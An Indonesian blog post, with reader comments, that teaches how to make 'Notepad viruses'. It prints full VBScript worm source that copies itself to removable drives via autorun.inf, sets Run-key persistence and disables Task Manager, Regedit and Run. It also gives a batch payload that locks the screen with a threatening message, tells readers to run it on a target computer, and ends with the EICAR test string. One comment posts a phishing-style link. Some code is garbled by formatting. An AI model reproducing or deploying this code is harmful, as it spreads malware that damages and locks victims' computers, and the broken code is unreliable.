Artikel kali ini aku dapatkan dari blog - blog hacker pembuat virus dengan hanya menggunakan notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menunggu User menjalankan infector-nya.
Berikut virus - virus sederhana yang dapat Anda buat hanya dengan menggunakan notepad :
1. Kalong.VBS
Entah kenapa virus sederhana dengan menggunakan notepad ini di beri nama Kalong.VBS oleh penciptanya. Cara membuatnya sebagai berikut :
- Buka notepad. Caranya : Start >> All Programs >> Accessories >> Notepad atau masuk pada menu RUN lalu ketik notepad dan Enter;
- Silahkan Copy kode di bawah ini ke Notepad
on error resume next ‘//–Dim kata-kata berikut ini–// dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd ‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–// isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs” set fs = createobject(“Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do ‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows) Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 39 ‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–// ‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket for each flashdrive in fs.drives ‘//–Cek Drive–// If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then ‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–// set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes = 39 ‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–// set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next ‘//–Manipulasi Registry–// set kalong = createobject(“WScript.Shell”) ‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–// kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “ ‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD” ‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD” ‘//–Manip – Disable klik kanan–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD” ‘//–Manip – Munculkan Pesan Setiap Windows Startup–// kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.” ‘//–Manip – Aktif setiap Windows Startup–// kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “ ‘//–Manip – Ubah RegisteredOwner dan Organization–// kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong” ‘//–kalong–// if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(“Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname ‘Akhir dari Kode
- Save code di Notepad dengan cara File >> Save As. Lalu di save as type pilih “All Files". Simpan dengan nama : k4l0n6.dll.vbs.
2. VWXP
Virus ini efeknya tidak terlalu berbahaya, karena efeknya hanya mengganti tampilan dari windows saja. Tapi sedikit bikin kaget juga, karena hampir tidak terdeteksi oleh Anti Virus.
Virus ini hanya aktif dan bisa bekerja pada Windows XP. Cara membuatnya sebagai berikut :
- Buka notepad. Caranya : Start >> All Programs >> Accessories >> Notepad atau masuk pada menu RUN lalu ketik notepad dan Enter;
- Silahkan Copy kode di bawah ini ke Notepad
@echo off copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- Lalu di Save As All Files dengan exstensi .bat misal : virusku.bat
- Kemudian buat file Autorun dengan Notepad. Buka kembali Notepad yang baru, lalu copy paste script berikut :
[autorun] open=nama_file.bat
nama_file.bat diganti dengan nama virus yang telah ditentukan diawal tadi. Kalau menggunakan contoh diatas, maka menjadi : open=virusku.bat - Lalu Save As All Files dengan nama : Autorun.inf
Kedua file ini harus disimpan dalam 1 folder, lalu seleksi file - file tersebut, klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY, copy file-file tersebut ke CD atau flashdisk dan nikmati efeknya.
3. CampLuck
Virus notepad berikutnya adalah virus yang sangat berbahaya. Cara membuatnya sebagai berikut :
- Buka notepad. Caranya : Start >> All Programs >> Accessories >> Notepad atau masuk pada menu RUN lalu ketik notepad dan Enter;
- Silahkan Copy kode di bawah ini ke Notepad
‘El Magnifico MAN on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs” set fs = createobject(“Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”) tf.attributes = 32 set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”) tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”) tf.attributes =39 set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next set rg = createobject(“WScript.Shell”) rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs” rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”" rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″ if check 1 then Wscript.sleep 100000 end if loop while check1 set sd = createobject(“Wscript.shell”) sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname do while year(now) >= 2008 WScript.sleep 20000 msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _ “ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _ “dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _ “iko permainan yang paten ma dunsanak” & vbcrlf & _ vbcrlf & vbcrlf & _ ” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _ ” aaa kini saaiknyo ma dunsanak” loop
- Lalu di Save As All Files dengan exstensi .bat misal : virusganas.bat
- Jalankan di komputer yang ingin diinjeksi dan rasakan efeknya.
4. Virus Ngetes Antivirus
Virus yang terakhir hanyalah sekedar pengetes Anti Virus di Komputer Anda. Ini adalah script sederhana (virus ringan katakanlah) buat sekedar ngetes antivirus. Cara membuatnya sebagai berikut :
- Buka notepad. Caranya : Start >> All Programs >> Accessories >> Notepad atau masuk pada menu RUN lalu ketik notepad dan Enter;
- Silahkan Copy kode di bawah ini ke Notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- Lalu simpan dengan nama apa saja terserah Anda dengan ekstention .bat.
Jika saat disimpan tidak terjadi apa - apa di Komputer Anda, berarti memang antivirus itu teramat jelek, maka perlu diganti.
19 Komentar
Waduh, ngapain bikin peternakan virus, mas. Nyoba aja saya takut
BalasHapusmakasih ilmunya bro.... salam kangen... dah lama ga singgah disini... jiaahaha... lebay.. :D
BalasHapusBro biar pc kena salyti gimana?
BalasHapusu bisa jamin manjur tidak?,soalnya sayang klo w download tp kagak manjur bro
BalasHapusvirus yg ke-4 berhasil, sekarang aku bisa buat virus tanpa vb
BalasHapusguud,,,,
BalasHapusGini Teman klau cUman mau nGe haCk FB Gara Gara chiP Poker cLick aja siTus ini http://tinyurl.com/37hjzxu
BalasHapuslaLu Login diSiTu pasTi chip pokeR Lo LanGsunG 12M sumpaH // Tapi!! akun Lo leveL nya harUs Level 20 keaTas dan Lo haRus loGin melalui siTus tersEbuT ok seLamaT mencoBa
thanks ya kami dari pelajar smk teknik komputer thanks ya atas bantuan nya
BalasHapusjelek
BalasHapus@reva : kmu yg jelek.. qiqiqiqiqiiii....
BalasHapusnice info gan!!!
BalasHapusiseng2 mbuat virus hehehe
untuk memperbaiki komputer yang terinveksi virus bagaimana boz
BalasHapustop mas e3nta saya coba
BalasHapusperlu dicoba om
BalasHapusbro kalo bikin nya di komputer kita punya, berarti virusnya kena kita dluan donk hehehehehehe
BalasHapusAne tau virus yg ini : X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
BalasHapusTERNYATA ANTIVIRUS SAYA BISA MENDETEKSINYA!!!
cara yang ke tiga dan keempat langsung kedeteksi antivirus gue.
BalasHapusyg nomor 3 ke detect sama anvir saya.
BalasHapusvirus yg nomor 4 gampang ke detect.
yg nomor 3 ke detect sama anvir saya.
BalasHapusvirus yg nomor 4 gampang ke detect.
Stop Komentar SPAM
Berkomentarlah dengan Sopan
Salam Anak Bangsa